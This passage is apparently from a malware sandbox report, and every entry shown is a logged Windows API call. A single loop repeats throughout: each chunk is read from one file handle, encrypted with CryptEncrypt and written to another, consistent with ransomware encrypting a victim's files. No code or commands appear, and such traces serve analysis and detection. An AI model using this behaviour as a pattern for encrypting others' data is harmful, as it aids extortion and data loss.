hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.424] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.424] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.424] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.425] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.425] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.426] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.426] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.427] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.427] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.427] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.427] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.427] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.428] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.428] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.428] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.428] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.429] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.429] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.430] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.430] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.430] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.430] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.430] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.431] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.431] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.431] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.431] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.431] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.432] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.432] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.432] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.432] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.432] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.432] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.432] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.432] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.432] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, 